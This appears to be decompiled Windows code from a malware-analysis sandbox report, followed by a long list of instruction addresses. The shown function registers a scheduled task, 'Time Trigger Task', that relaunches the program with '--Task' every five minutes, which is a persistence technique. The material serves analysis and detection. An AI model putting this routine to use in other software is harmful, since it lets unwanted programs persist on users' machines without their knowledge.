                                                                                                    				intOrPtr* _t350;
                                                                                                    				intOrPtr* _t351;
                                                                                                    				short _t352;
                                                                                                    				intOrPtr* _t354;
                                                                                                    				intOrPtr* _t355;
                                                                                                    				intOrPtr* _t356;
                                                                                                    				short _t357;
                                                                                                    				intOrPtr* _t365;
                                                                                                    				intOrPtr* _t378;
                                                                                                    				intOrPtr* _t380;
                                                                                                    				intOrPtr* _t382;
                                                                                                    				intOrPtr* _t386;
                                                                                                    				intOrPtr* _t388;
                                                                                                    				intOrPtr* _t390;
                                                                                                    				intOrPtr* _t392;
                                                                                                    				void* _t394;
                                                                                                    				char _t395;
                                                                                                    				intOrPtr* _t397;
                                                                                                    				intOrPtr* _t398;
                                                                                                    				intOrPtr* _t402;
                                                                                                    				intOrPtr* _t410;
                                                                                                    				intOrPtr* _t417;
                                                                                                    				intOrPtr* _t420;
                                                                                                    				intOrPtr* _t423;
                                                                                                    				intOrPtr* _t428;
                                                                                                    				intOrPtr* _t431;
                                                                                                    				intOrPtr* _t433;
                                                                                                    				intOrPtr* _t454;
                                                                                                    				intOrPtr* _t457;
                                                                                                    				intOrPtr* _t459;
                                                                                                    				intOrPtr* _t466;
                                                                                                    				intOrPtr* _t469;
                                                                                                    				short _t479;
                                                                                                    				short _t480;
                                                                                                    				short _t484;
                                                                                                    				short _t491;
                                                                                                    				short _t499;
                                                                                                    				short _t500;
                                                                                                    				short _t501;
                                                                                                    				short _t502;
                                                                                                    				short _t504;
                                                                                                    				intOrPtr* _t511;
                                                                                                    				short _t512;
                                                                                                    				short _t513;
                                                                                                    				void* _t516;
                                                                                                    				void* _t517;
                                                                                                    				void* _t519;
                                                                                                    				intOrPtr* _t540;
                                                                                                    				short _t541;
                                                                                                    				short _t542;
                                                                                                    				intOrPtr _t543;
                                                                                                    				void* _t544;
                                                                                                    
                                                                                                    				_t222 =  *[fs:0x0];
                                                                                                    				 *[fs:0x0] = _t543;
                                                                                                    				_t544 = _t543 - 0x538;
                                                                                                    				_t517 = __ecx;
                                                                                                    				_v8 = 0;
                                                                                                    				__imp__CoInitialize(0, _t516, _t519, _t394, _t222, 0x4ca928, 0xffffffff); // executed
                                                                                                    				if(_t222 >= 0) {
                                                                                                    					__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 6, 3, 0, 0, 0); // executed
                                                                                                    					_v100 = 7;
                                                                                                    					_v120 = 0;
                                                                                                    					_v104 = 0;
                                                                                                    					E00414690(_t394,  &_v120,  &_a4, 0);
                                                                                                    					_t226 =  &_v32;
                                                                                                    					_v8 = 1;
                                                                                                    					_v32 = 0;
                                                                                                    					__imp__CoCreateInstance(0x4d506c, 0, 1, 0x4d4fec, _t226, 0xffffffff); // executed
                                                                                                    					__eflags = _t226;
                                                                                                    					if(_t226 < 0) {
                                                                                                    						L74:
                                                                                                    						__imp__CoUninitialize();
                                                                                                    						_t395 = 0;
                                                                                                    					} else {
                                                                                                    						_t397 = __imp__#8;
                                                                                                    						 *_t397( &_v156);
                                                                                                    						asm("movdqu xmm0, [ebp-0x98]");
                                                                                                    						asm("movdqu [ebp-0xb8], xmm0");
                                                                                                    						 *_t397( &_v140);
                                                                                                    						asm("movdqu xmm0, [ebp-0x88]");
                                                                                                    						asm("movdqu [ebp-0xc8], xmm0");
                                                                                                    						 *_t397( &_v172);
                                                                                                    						asm("movdqu xmm0, [ebp-0xa8]");
                                                                                                    						asm("movdqu [ebp-0xd8], xmm0");
                                                                                                    						 *_t397( &_v244);
                                                                                                    						_v8 = 5;
                                                                                                    						asm("movdqu xmm0, [ebp-0xb8]");
                                                                                                    						_t402 = _v32;
                                                                                                    						asm("movdqu [eax], xmm0");
                                                                                                    						asm("movdqu xmm0, [ebp-0xc8]");
                                                                                                    						asm("movdqu [eax], xmm0");
                                                                                                    						_t544 = _t544 - 0xffffffffffffffe0;
                                                                                                    						asm("movdqu xmm0, [ebp-0xd8]");
                                                                                                    						asm("movdqu [eax], xmm0");
                                                                                                    						asm("movdqu xmm0, [ebp-0xf0]");
                                                                                                    						asm("movdqu [eax], xmm0"); // executed
                                                                                                    						_t243 =  *((intOrPtr*)( *_t402 + 0x28))(_t402);
                                                                                                    						__imp__#9( &_v244);
                                                                                                    						__imp__#9( &_v172);
                                                                                                    						__imp__#9( &_v140);
                                                                                                    						_v8 = 1;
                                                                                                    						__imp__#9( &_v156);
                                                                                                    						__eflags = _t243;
                                                                                                    						if(__eflags >= 0) {
                                                                                                    							_v24 = 0;
                                                                                                    							_t248 = E0040B140(_t397,  &_v28, __eflags, "\\");
                                                                                                    							_v8 = 6;
                                                                                                    							_t249 =  *_t248;
                                                                                                    							__eflags = _t249;
                                                                                                    							if(_t249 == 0) {
                                                                                                    								_t479 = 0;
                                                                                                    								__eflags = 0;
                                                                                                    							} else {
                                                                                                    								_t479 =  *_t249;
                                                                                                    							}
                                                                                                    							_t250 = _v32;
                                                                                                    							_t251 =  *((intOrPtr*)( *_t250 + 0x1c))(_t250, _t479,  &_v24);
                                                                                                    							_v8 = 1;
                                                                                                    							E0040B1D0( &_v28, _t479);
                                                                                                    							__eflags = _t251;
                                                                                                    							if(__eflags >= 0) {
                                                                                                    								_t253 = E0040B140(_t397,  &_v28, __eflags, L"Time Trigger Task");
                                                                                                    								_v8 = 7;
                                                                                                    								_t254 =  *_t253;
                                                                                                    								__eflags = _t254;
                                                                                                    								if(_t254 == 0) {
                                                                                                    									_t480 = 0;
                                                                                                    									__eflags = 0;
                                                                                                    								} else {
                                                                                                    									_t480 =  *_t254;
                                                                                                    								}
                                                                                                    								_t255 = _v24;
                                                                                                    								 *((intOrPtr*)( *_t255 + 0x3c))(_t255, _t480, 0);
                                                                                                    								_v8 = 1;
                                                                                                    								E0040B1D0( &_v28, _t480);
                                                                                                    								_t258 = _v32;
                                                                                                    								_v20 = 0;
                                                                                                    								_t259 =  *((intOrPtr*)( *_t258 + 0x24))(_t258, 0,  &_v20);
                                                                                                    								_t410 = _v32;
                                                                                                    								 *((intOrPtr*)( *_t410 + 8))(_t410);
                                                                                                    								__eflags = _t259;
                                                                                                    								if(_t259 >= 0) {
                                                                                                    									_t261 = _v20;
                                                                                                    									_v64 = 0;
                                                                                                    									__eflags =  *((intOrPtr*)( *_t261 + 0x1c))(_t261,  &_v64);
                                                                                                    									if(__eflags < 0) {
                                                                                                    										L73:
                                                                                                    										_t263 = _v24;
                                                                                                    										 *((intOrPtr*)( *_t263 + 8))(_t263);
                                                                                                    										_t265 = _v20;
                                                                                                    										 *((intOrPtr*)( *_t265 + 8))(_t265);
                                                                                                    										goto L74;
                                                                                                    									} else {
                                                                                                    										_t267 = E0040B140(_t397,  &_v28, __eflags, L"Author Name");
                                                                                                    										_v8 = 8;
                                                                                                    										_t268 =  *_t267;
                                                                                                    										__eflags = _t268;
                                                                                                    										if(_t268 == 0) {
                                                                                                    											_t484 = 0;
                                                                                                    											__eflags = 0;
                                                                                                    										} else {
                                                                                                    											_t484 =  *_t268;
                                                                                                    										}
                                                                                                    										_t269 = _v64;
                                                                                                    										_t270 =  *((intOrPtr*)( *_t269 + 0x28))(_t269, _t484);
                                                                                                    										_v8 = 1;
                                                                                                    										E0040B1D0( &_v28, _t484);
                                                                                                    										_t417 = _v64;
                                                                                                    										 *((intOrPtr*)( *_t417 + 8))(_t417);
                                                                                                    										__eflags = _t270;
                                                                                                    										if(_t270 < 0) {
                                                                                                    											goto L73;
                                                                                                    										} else {
                                                                                                    											_t273 = _v20;
                                                                                                    											_v56 = 0;
                                                                                                    											_t274 =  *((intOrPtr*)( *_t273 + 0x3c))(_t273,  &_v56);
                                                                                                    											__eflags = _t274;
                                                                                                    											if(_t274 < 0) {
                                                                                                    												goto L73;
                                                                                                    											} else {
                                                                                                    												_t275 = _v56;
                                                                                                    												_t276 =  *((intOrPtr*)( *_t275 + 0x38))(_t275, 3);
                                                                                                    												_t420 = _v56;
                                                                                                    												 *((intOrPtr*)( *_t420 + 8))(_t420);
                                                                                                    												__eflags = _t276;
                                                                                                    												if(_t276 < 0) {
                                                                                                    													goto L73;
                                                                                                    												} else {
                                                                                                    													_t278 = _v20;
                                                                                                    													_v48 = 0;
                                                                                                    													_t279 =  *((intOrPtr*)( *_t278 + 0x2c))(_t278,  &_v48);
                                                                                                    													__eflags = _t279;
                                                                                                    													if(_t279 < 0) {
                                                                                                    														goto L73;
                                                                                                    													} else {
                                                                                                    														_t280 = _v48;
                                                                                                    														_t281 =  *((intOrPtr*)( *_t280 + 0x58))(_t280, 0xffffffff);
                                                                                                    														_t423 = _v48;
                                                                                                    														 *((intOrPtr*)( *_t423 + 8))(_t423);
                                                                                                    														__eflags = _t281;
                                                                                                    														if(_t281 < 0) {
                                                                                                    															goto L73;
                                                                                                    														} else {
                                                                                                    															_t283 = _v48;
                                                                                                    															_v76 = 0;
                                                                                                    															__eflags =  *((intOrPtr*)( *_t283 + 0x9c))(_t283,  &_v76);
                                                                                                    															if(__eflags < 0) {
                                                                                                    																goto L73;
                                                                                                    															} else {
                                                                                                    																_t285 = E0040B140(_t397,  &_v28, __eflags, L"PT5M");
                                                                                                    																_v8 = 9;
                                                                                                    																_t286 =  *_t285;
                                                                                                    																__eflags = _t286;
                                                                                                    																if(_t286 == 0) {
                                                                                                    																	_t491 = 0;
                                                                                                    																	__eflags = 0;
                                                                                                    																} else {
                                                                                                    																	_t491 =  *_t286;
                                                                                                    																}
                                                                                                    																_t287 = _v76;
                                                                                                    																_t288 =  *((intOrPtr*)( *_t287 + 0x28))(_t287, _t491);
                                                                                                    																_v8 = 1;
                                                                                                    																E0040B1D0( &_v28, _t491);
                                                                                                    																_t428 = _v76;
                                                                                                    																 *((intOrPtr*)( *_t428 + 8))(_t428);
                                                                                                    																__eflags = _t288;
                                                                                                    																if(_t288 < 0) {
                                                                                                    																	goto L73;
                                                                                                    																} else {
                                                                                                    																	_t291 = _v20;
                                                                                                    																	_v80 = 0;
                                                                                                    																	_t292 =  *((intOrPtr*)( *_t291 + 0x24))(_t291,  &_v80);
                                                                                                    																	__eflags = _t292;
                                                                                                    																	if(_t292 < 0) {
                                                                                                    																		goto L73;
                                                                                                    																	} else {
                                                                                                    																		_t293 = _v80;
                                                                                                    																		_v68 = 0;
                                                                                                    																		_t294 =  *((intOrPtr*)( *_t293 + 0x28))(_t293, 1,  &_v68);
                                                                                                    																		_t431 = _v80;
                                                                                                    																		 *((intOrPtr*)( *_t431 + 8))(_t431);
                                                                                                    																		__eflags = _t294;
                                                                                                    																		if(_t294 < 0) {
                                                                                                    																			goto L73;
                                                                                                    																		} else {
                                                                                                    																			_t296 = _v68;
                                                                                                    																			_v40 = 0;
                                                                                                    																			_t297 =  *((intOrPtr*)( *_t296))(_t296, 0x4d50ec,  &_v40);
                                                                                                    																			_t433 = _v68;
                                                                                                    																			 *((intOrPtr*)( *_t433 + 8))(_t433);
                                                                                                    																			__eflags = _t297;
                                                                                                    																			if(_t297 < 0) {
                                                                                                    																				goto L73;
                                                                                                    																			} else {
                                                                                                    																				_t299 = _v40;
                                                                                                    																				__eflags =  *((intOrPtr*)( *_t299 + 0x28))(_t299,  &_v60);
                                                                                                    																				if(__eflags < 0) {
                                                                                                    																					goto L73;
                                                                                                    																				} else {
                                                                                                    																					_t301 = E0040B140(_t397,  &_v28, __eflags, L"PT5M");
                                                                                                    																					_v8 = 0xa;
                                                                                                    																					_t302 =  *_t301;
                                                                                                    																					__eflags = _t302;
                                                                                                    																					if(_t302 == 0) {
                                                                                                    																						_t499 = 0;
                                                                                                    																						__eflags = 0;
                                                                                                    																					} else {
                                                                                                    																						_t499 =  *_t302;
                                                                                                    																					}
                                                                                                    																					_t303 = _v60;
                                                                                                    																					_t304 =  *((intOrPtr*)( *_t303 + 0x20))(_t303, _t499);
                                                                                                    																					_v8 = 1;
                                                                                                    																					E0040B1D0( &_v28, _t499);
                                                                                                    																					__eflags = _t304;
                                                                                                    																					if(__eflags < 0) {
                                                                                                    																						goto L73;
                                                                                                    																					} else {
                                                                                                    																						_t306 = E0040B140(_t397,  &_v28, __eflags, 0x500078);
                                                                                                    																						_v8 = 0xb;
                                                                                                    																						_t307 =  *_t306;
                                                                                                    																						__eflags = _t307;
                                                                                                    																						if(_t307 == 0) {
                                                                                                    																							_t500 = 0;
                                                                                                    																							__eflags = 0;
                                                                                                    																						} else {
                                                                                                    																							_t500 =  *_t307;
                                                                                                    																						}
                                                                                                    																						_t308 = _v60;
                                                                                                    																						_t309 =  *((intOrPtr*)( *_t308 + 0x28))(_t308, _t500);
                                                                                                    																						_v8 = 1;
                                                                                                    																						E0040B1D0( &_v28, _t500);
                                                                                                    																						__eflags = _t309;
                                                                                                    																						if(_t309 < 0) {
                                                                                                    																							goto L73;
                                                                                                    																						} else {
                                                                                                    																							_t311 = _v40;
                                                                                                    																							__eflags =  *((intOrPtr*)( *_t311 + 0x2c))(_t311, _v60);
                                                                                                    																							if(__eflags < 0) {
                                                                                                    																								goto L73;
                                                                                                    																							} else {
                                                                                                    																								_t313 = E0040B140(_t397,  &_v28, __eflags, L"Trigger1");
                                                                                                    																								_v8 = 0xc;
                                                                                                    																								_t314 =  *_t313;
                                                                                                    																								__eflags = _t314;
                                                                                                    																								if(_t314 == 0) {
                                                                                                    																									_t501 = 0;
                                                                                                    																									__eflags = 0;
                                                                                                    																								} else {
                                                                                                    																									_t501 =  *_t314;
                                                                                                    																								}
                                                                                                    																								_t315 = _v40;
                                                                                                    																								_t316 =  *((intOrPtr*)( *_t315 + 0x24))(_t315, _t501);
                                                                                                    																								_v8 = 1;
                                                                                                    																								E0040B1D0( &_v28, _t501);
                                                                                                    																								__eflags = _t316;
                                                                                                    																								if(__eflags < 0) {
                                                                                                    																									goto L73;
                                                                                                    																								} else {
                                                                                                    																									_t318 = E0040B140(_t397,  &_v28, __eflags, L"2030-05-02T08:00:00");
                                                                                                    																									_v8 = 0xd;
                                                                                                    																									_t319 =  *_t318;
                                                                                                    																									__eflags = _t319;
                                                                                                    																									if(_t319 == 0) {
                                                                                                    																										_t502 = 0;
                                                                                                    																										__eflags = 0;
                                                                                                    																									} else {
                                                                                                    																										_t502 =  *_t319;
                                                                                                    																									}
                                                                                                    																									_t320 = _v40;
                                                                                                    																									_t321 =  *((intOrPtr*)( *_t320 + 0x44))(_t320, _t502);
                                                                                                    																									_v8 = 1;
                                                                                                    																									E0040B1D0( &_v28, _t502);
                                                                                                    																									__eflags = _t321;
                                                                                                    																									if(__eflags < 0) {
                                                                                                    																										goto L73;
                                                                                                    																									} else {
                                                                                                    																										E00423AAF( &_v28, _t502, __eflags,  &_v92);
                                                                                                    																										asm("cdq");
                                                                                                    																										_v92 = _v92 + _t517;
                                                                                                    																										asm("adc [ebp-0x54], edx"); // executed
                                                                                                    																										_t327 = E00423551( &_v92); // executed
                                                                                                    																										E004228E0( &_v324, 0x50, "%Y-%m-%dT%H:%M:%S", _t327);
                                                                                                    																										_v33 = 0;
                                                                                                    																										E00412C40(_t544, _t517,  &_v324);
                                                                                                    																										_t332 = E00412900( &_v228, _v33);
                                                                                                    																										_t544 = _t544 + 0x18;
                                                                                                    																										_v8 = 0xe;
                                                                                                    																										__eflags =  *((intOrPtr*)(_t332 + 0x14)) - 8;
                                                                                                    																										if(__eflags >= 0) {
                                                                                                    																											_t332 =  *_t332;
                                                                                                    																										}
                                                                                                    																										_t333 = E0040B140(_t397,  &_v28, __eflags, _t332);
                                                                                                    																										_v8 = 0xf;
                                                                                                    																										_t334 =  *_t333;
                                                                                                    																										__eflags = _t334;
                                                                                                    																										if(_t334 == 0) {
                                                                                                    																											_t504 = 0;
                                                                                                    																											__eflags = 0;
                                                                                                    																										} else {
                                                                                                    																											_t504 =  *_t334;
                                                                                                    																										}
                                                                                                    																										_t335 = _v40;
                                                                                                    																										_t336 =  *((intOrPtr*)( *_t335 + 0x3c))(_t335, _t504);
                                                                                                    																										E0040B1D0( &_v28, _t504);
                                                                                                    																										_v8 = 1;
                                                                                                    																										E00413210( &_v228);
                                                                                                    																										_t454 = _v40;
                                                                                                    																										 *((intOrPtr*)( *_t454 + 8))(_t454);
                                                                                                    																										__eflags = _t336;
                                                                                                    																										if(_t336 < 0) {
                                                                                                    																											goto L73;
                                                                                                    																										} else {
                                                                                                    																											_t340 = _v20;
                                                                                                    																											_v52 = 0;
                                                                                                    																											_t341 =  *((intOrPtr*)( *_t340 + 0x44))(_t340,  &_v52);
                                                                                                    																											__eflags = _t341;
                                                                                                    																											if(_t341 < 0) {
                                                                                                    																												goto L73;
                                                                                                    																											} else {
                                                                                                    																												_t342 = _v52;
                                                                                                    																												_v72 = 0;
                                                                                                    																												_t343 =  *((intOrPtr*)( *_t342 + 0x30))(_t342, 0,  &_v72);
                                                                                                    																												_t457 = _v52;
                                                                                                    																												 *((intOrPtr*)( *_t457 + 8))(_t457);
                                                                                                    																												__eflags = _t343;
                                                                                                    																												if(_t343 < 0) {
                                                                                                    																													goto L73;
                                                                                                    																												} else {
                                                                                                    																													_t345 = _v72;
                                                                                                    																													_v44 = 0;
                                                                                                    																													_t346 =  *((intOrPtr*)( *_t345))(_t345, 0x4d511c,  &_v44);
                                                                                                    																													_t459 = _v72;
                                                                                                    																													 *((intOrPtr*)( *_t459 + 8))(_t459);
                                                                                                    																													__eflags = _t346;
                                                                                                    																													if(_t346 < 0) {
                                                                                                    																														goto L73;
                                                                                                    																													} else {
                                                                                                    																														__eflags = _v100 - 8;
                                                                                                    																														_t349 =  >=  ? _v120 :  &_v120;
                                                                                                    																														_t350 = E0040B140(_t397,  &_v28, _v100 - 8,  >=  ? _v120 :  &_v120);
                                                                                                    																														_v8 = 0x10;
                                                                                                    																														_t511 =  *_t350;
                                                                                                    																														__eflags = _t511;
                                                                                                    																														if(_t511 == 0) {
                                                                                                    																															_t512 = 0;
                                                                                                    																															__eflags = 0;
                                                                                                    																														} else {
                                                                                                    																															_t512 =  *_t511;
                                                                                                    																														}
                                                                                                    																														_t351 = _v44;
                                                                                                    																														_t352 =  *((intOrPtr*)( *_t351 + 0x2c))(_t351, _t512);
                                                                                                    																														_v8 = 1;
                                                                                                    																														E0040B1D0( &_v28, _t512);
                                                                                                    																														__eflags = _t352;
                                                                                                    																														if(__eflags >= 0) {
                                                                                                    																															_t354 = E0040B140(_t397,  &_v28, __eflags, L"--Task");
                                                                                                    																															_v8 = 0x11;
                                                                                                    																															_t355 =  *_t354;
                                                                                                    																															__eflags = _t355;
                                                                                                    																															if(_t355 == 0) {
                                                                                                    																																_t513 = 0;
                                                                                                    																																__eflags = 0;
                                                                                                    																															} else {
                                                                                                    																																_t513 =  *_t355;
                                                                                                    																															}
                                                                                                    																															_t356 = _v44;
                                                                                                    																															_t357 =  *((intOrPtr*)( *_t356 + 0x34))(_t356, _t513);
                                                                                                    																															_v8 = 1;
                                                                                                    																															_t539 = _t357;
                                                                                                    																															E0040B1D0( &_v28, _t513);
                                                                                                    																															_t466 = _v44;
                                                                                                    																															 *((intOrPtr*)( *_t466 + 8))(_t466);
                                                                                                    																															__eflags = _t357;
                                                                                                    																															if(_t357 < 0) {
                                                                                                    																																goto L73;
                                                                                                    																															} else {
                                                                                                    																																_v96 = 0;
                                                                                                    																																E0040B400( &_v172, _t539, _t466);
                                                                                                    																																asm("movdqu xmm0, [eax]");
                                                                                                    																																asm("movdqu [ebp-0xd8], xmm0");
                                                                                                    																																 *_t397( &_v140);
                                                                                                    																																asm("movdqu xmm0, [ebp-0x88]");
                                                                                                    																																asm("movdqu [ebp-0xc8], xmm0");
                                                                                                    																																 *_t397( &_v156);
                                                                                                    																																_v8 = 0x14;
                                                                                                    																																asm("movdqu xmm0, [ebp-0x98]");
                                                                                                    																																asm("movdqu [ebp-0xb8], xmm0");
                                                                                                    																																_t365 = E0040B140(_t397,  &_v28, __eflags, L"Time Trigger Task");
                                                                                                    																																_v8 = 0x15;
                                                                                                    																																_t540 =  *_t365;
                                                                                                    																																__eflags = _t540;
                                                                                                    																																if(_t540 == 0) {
                                                                                                    																																	_t541 = 0;
                                                                                                    																																	__eflags = 0;
                                                                                                    																																} else {
                                                                                                    																																	_t541 =  *_t540;
                                                                                                    																																}
                                                                                                    																																asm("movdqu xmm0, [ebp-0xd8]");
                                                                                                    																																_t469 = _v24;
                                                                                                    																																asm("movdqu [eax], xmm0");
                                                                                                    																																_t544 = _t544 - 0xfffffffffffffff0;
                                                                                                    																																asm("movdqu xmm0, [ebp-0xc8]");
                                                                                                    																																asm("movdqu [eax], xmm0");
                                                                                                    																																asm("movdqu xmm0, [ebp-0xb8]");
                                                                                                    																																asm("movdqu [eax], xmm0");
                                                                                                    																																_t542 =  *((intOrPtr*)( *_t469 + 0x44))(_t469, _t541, _v20, 6, 3,  &_v96);
                                                                                                    																																E0040B1D0( &_v28,  *_t469);
                                                                                                    																																_t398 = __imp__#9;
                                                                                                    																																 *_t398( &_v156);
                                                                                                    																																 *_t398( &_v140);
                                                                                                    																																_v8 = 1;
                                                                                                    																																 *_t398( &_v172);
                                                                                                    																																__eflags = _t542;
                                                                                                    																																if(_t542 >= 0) {
                                                                                                    																																	_t378 = _v24;
                                                                                                    																																	 *((intOrPtr*)( *_t378 + 8))(_t378);
                                                                                                    																																	_t380 = _v20;
                                                                                                    																																	 *((intOrPtr*)( *_t380 + 8))(_t380);
                                                                                                    																																	_t382 = _v96;
                                                                                                    																																	 *((intOrPtr*)( *_t382 + 8))(_t382);
                                                                                                    																																	__imp__CoUninitialize(); // executed
                                                                                                    																																	_t395 = 1;
                                                                                                    																																} else {
                                                                                                    																																	swprintf( &_v1348, 0x400, "RegisterTaskDefinition. Err: %X\n", _t542);
                                                                                                    																																	_t544 = _t544 + 0x10;
                                                                                                    																																	goto L73;
                                                                                                    																																}
                                                                                                    																															}
                                                                                                    																														} else {
                                                                                                    																															_t386 = _v44;
                                                                                                    																															 *((intOrPtr*)( *_t386 + 8))(_t386);
                                                                                                    																															goto L73;
                                                                                                    																														}
                                                                                                    																													}
                                                                                                    																												}
                                                                                                    																											}
                                                                                                    																										}
                                                                                                    																									}
                                                                                                    																								}
                                                                                                    																							}
                                                                                                    																						}
                                                                                                    																					}
                                                                                                    																				}
                                                                                                    																			}
                                                                                                    																		}
                                                                                                    																	}
                                                                                                    																}
                                                                                                    															}
                                                                                                    														}
                                                                                                    													}
                                                                                                    												}
                                                                                                    											}
                                                                                                    										}
                                                                                                    									}
                                                                                                    								} else {
                                                                                                    									_t388 = _v24;
                                                                                                    									 *((intOrPtr*)( *_t388 + 8))(_t388);
                                                                                                    									__imp__CoUninitialize();
                                                                                                    									_t395 = 0;
                                                                                                    								}
                                                                                                    							} else {
                                                                                                    								_t390 = _v32;
                                                                                                    								 *((intOrPtr*)( *_t390 + 8))(_t390);
                                                                                                    								__imp__CoUninitialize();
                                                                                                    								_t395 = 0;
                                                                                                    							}
                                                                                                    						} else {
                                                                                                    							_t392 = _v32;
                                                                                                    							 *((intOrPtr*)( *_t392 + 8))(_t392);
                                                                                                    							__imp__CoUninitialize();
                                                                                                    							_t395 = 0;
                                                                                                    						}
                                                                                                    					}
                                                                                                    					__eflags = _v100 - 8;
                                                                                                    					if(_v100 >= 8) {
                                                                                                    						L00422587(_v120);
                                                                                                    						_t544 = _t544 + 4;
                                                                                                    					}
                                                                                                    					__eflags = 0;
                                                                                                    					_v100 = 7;
                                                                                                    					_v104 = 0;
                                                                                                    					_v120 = 0;
                                                                                                    				} else {
                                                                                                    					_t395 = 0;
                                                                                                    				}
                                                                                                    				if(_a24 >= 8) {
                                                                                                    					L00422587(_a4);
                                                                                                    				}
                                                                                                    				 *[fs:0x0] = _v16;
                                                                                                    				return _t395;
                                                                                                    			}




























































































































































                                                                                                    0x0040d24a
                                                                                                    0x0040d251
                                                                                                    0x0040d258
                                                                                                    0x0040d261
                                                                                                    0x0040d265
                                                                                                    0x0040d26c
                                                                                                    0x0040d274
                                                                                                    0x0040d28f
                                                                                                    0x0040d297
                                                                                                    0x0040d2a1
                                                                                                    0x0040d2ab
                                                                                                    0x0040d2b3
                                                                                                    0x0040d2b8
                                                                                                    0x0040d2bb
                                                                                                    0x0040d2ce
                                                                                                    0x0040d2d5
                                                                                                    0x0040d2db
                                                                                                    0x0040d2dd
                                                                                                    0x0040da3c
                                                                                                    0x0040da3c
                                                                                                    0x0040da42
                                                                                                    0x0040d2e3
                                                                                                    0x0040d2e3
                                                                                                    0x0040d2f0
                                                                                                    0x0040d2f2
                                                                                                    0x0040d301
                                                                                                    0x0040d309
                                                                                                    0x0040d30b
                                                                                                    0x0040d31a
                                                                                                    0x0040d322
                                                                                                    0x0040d324
                                                                                                    0x0040d333
                                                                                                    0x0040d33b
                                                                                                    0x0040d33d
                                                                                                    0x0040d344
                                                                                                    0x0040d34c
                                                                                                    0x0040d356
                                                                                                    0x0040d35f
                                                                                                    0x0040d367
                                                                                                    0x0040d36d
                                                                                                    0x0040d370
                                                                                                    0x0040d378
                                                                                                    0x0040d37e
                                                                                                    0x0040d387
                                                                                                    0x0040d38b
                                                                                                    0x0040d397
                                                                                                    0x0040d3a4
                                                                                                    0x0040d3b1
                                                                                                    0x0040d3bd
                                                                                                    0x0040d3c2
                                                                                                    0x0040d3c8
                                                                                                    0x0040d3ca
                                                                                                    0x0040d3ea
                                                                                                    0x0040d3f1
                                                                                                    0x0040d3f6
                                                                                                    0x0040d3fa
                                                                                                    0x0040d3fc
                                                                                                    0x0040d3fe
                                                                                                    0x0040d404
                                                                                                    0x0040d404
                                                                                                    0x0040d400
                                                                                                    0x0040d400
                                                                                                    0x0040d400
                                                                                                    0x0040d406
                                                                                                    0x0040d411
                                                                                                    0x0040d417
                                                                                                    0x0040d41d
                                                                                                    0x0040d422
                                                                                                    0x0040d424
                                                                                                    0x0040d444
                                                                                                    0x0040d449
                                                                                                    0x0040d44d
                                                                                                    0x0040d44f
                                                                                                    0x0040d451
                                                                                                    0x0040d457
                                                                                                    0x0040d457
                                                                                                    0x0040d453
                                                                                                    0x0040d453
                                                                                                    0x0040d453
                                                                                                    0x0040d459
                                                                                                    0x0040d462
                                                                                                    0x0040d468
                                                                                                    0x0040d46c
                                                                                                    0x0040d471
                                                                                                    0x0040d478
                                                                                                    0x0040d484
                                                                                                    0x0040d487
                                                                                                    0x0040d48f
                                                                                                    0x0040d492
                                                                                                    0x0040d494
                                                                                                    0x0040d4ac
                                                                                                    0x0040d4b2
                                                                                                    0x0040d4c0
                                                                                                    0x0040d4c2
                                                                                                    0x0040da2a
                                                                                                    0x0040da2a
                                                                                                    0x0040da30
                                                                                                    0x0040da33
                                                                                                    0x0040da39
                                                                                                    0x00000000
                                                                                                    0x0040d4c8
                                                                                                    0x0040d4d0
                                                                                                    0x0040d4d5
                                                                                                    0x0040d4d9
                                                                                                    0x0040d4db
                                                                                                    0x0040d4dd
                                                                                                    0x0040d4e3
                                                                                                    0x0040d4e3
                                                                                                    0x0040d4df
                                                                                                    0x0040d4df
                                                                                                    0x0040d4df
                                                                                                    0x0040d4e5
                                                                                                    0x0040d4ec
                                                                                                    0x0040d4f2
                                                                                                    0x0040d4f8
                                                                                                    0x0040d4fd
                                                                                                    0x0040d503
                                                                                                    0x0040d506
                                                                                                    0x0040d508
                                                                                                    0x00000000
                                                                                                    0x0040d50e
                                                                                                    0x0040d50e
                                                                                                    0x0040d514
                                                                                                    0x0040d51f
                                                                                                    0x0040d522
                                                                                                    0x0040d524
                                                                                                    0x00000000
                                                                                                    0x0040d52a
                                                                                                    0x0040d52a
                                                                                                    0x0040d532
                                                                                                    0x0040d535
                                                                                                    0x0040d53d
                                                                                                    0x0040d540
                                                                                                    0x0040d542
                                                                                                    0x00000000
                                                                                                    0x0040d548
                                                                                                    0x0040d548
                                                                                                    0x0040d54e
                                                                                                    0x0040d559
                                                                                                    0x0040d55c
                                                                                                    0x0040d55e
                                                                                                    0x00000000
                                                                                                    0x0040d564
                                                                                                    0x0040d564
                                                                                                    0x0040d56c
                                                                                                    0x0040d56f
                                                                                                    0x0040d577
                                                                                                    0x0040d57a
                                                                                                    0x0040d57c
                                                                                                    0x00000000
                                                                                                    0x0040d582
                                                                                                    0x0040d582
                                                                                                    0x0040d588
                                                                                                    0x0040d599
                                                                                                    0x0040d59b
                                                                                                    0x00000000
                                                                                                    0x0040d5a1
                                                                                                    0x0040d5a9
                                                                                                    0x0040d5ae
                                                                                                    0x0040d5b2
                                                                                                    0x0040d5b4
                                                                                                    0x0040d5b6
                                                                                                    0x0040d5bc
                                                                                                    0x0040d5bc
                                                                                                    0x0040d5b8
                                                                                                    0x0040d5b8
                                                                                                    0x0040d5b8
                                                                                                    0x0040d5be
                                                                                                    0x0040d5c5
                                                                                                    0x0040d5cb
                                                                                                    0x0040d5d1
                                                                                                    0x0040d5d6
                                                                                                    0x0040d5dc
                                                                                                    0x0040d5df
                                                                                                    0x0040d5e1
                                                                                                    0x00000000
                                                                                                    0x0040d5e7
                                                                                                    0x0040d5e7
                                                                                                    0x0040d5ed
                                                                                                    0x0040d5f8
                                                                                                    0x0040d5fb
                                                                                                    0x0040d5fd
                                                                                                    0x00000000
                                                                                                    0x0040d603
                                                                                                    0x0040d603
                                                                                                    0x0040d60a
                                                                                                    0x0040d616
                                                                                                    0x0040d619
                                                                                                    0x0040d621
                                                                                                    0x0040d624
                                                                                                    0x0040d626
                                                                                                    0x00000000
                                                                                                    0x0040d62c
                                                                                                    0x0040d62c
                                                                                                    0x0040d633
                                                                                                    0x0040d642
                                                                                                    0x0040d644
                                                                                                    0x0040d64c
                                                                                                    0x0040d64f
                                                                                                    0x0040d651
                                                                                                    0x00000000
                                                                                                    0x0040d657
                                                                                                    0x0040d657
                                                                                                    0x0040d664
                                                                                                    0x0040d666
                                                                                                    0x00000000
                                                                                                    0x0040d66c
                                                                                                    0x0040d674
